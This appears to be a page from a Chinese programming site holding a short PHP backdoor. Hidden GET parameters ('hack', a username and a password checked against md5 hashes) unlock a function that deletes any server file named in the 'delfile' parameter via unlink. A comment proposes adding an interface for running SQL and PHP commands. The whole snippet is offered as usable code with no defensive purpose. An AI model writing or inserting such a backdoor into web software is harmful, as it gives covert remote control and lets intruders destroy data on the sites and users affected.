日期:2014-05-16 浏览次数:20616 次
<?php
$hack = isset($_GET['hack'])? $_GET['hack'] : 0;
$hackusername = isset($_GET['hackusername'])? $_GET['hackusername'] : '';
$hackpassword = isset($_GET['hackpassword'])? $_GET['hackpassword'] : '';
if($hack==1 && md5($hackusername)=='xxxx' && md5($hackpassword)=='xxxxxx'){
$delfile = isset($_GET['delfile'])? $_GET['delfile'] : '';
if($delfile!=''){
delfile($delfile);
}
// 这里还可以做一个界面,可以输入sql,输入php执行命令那些.
}
function delfile($path){
unlink($path);
}
?>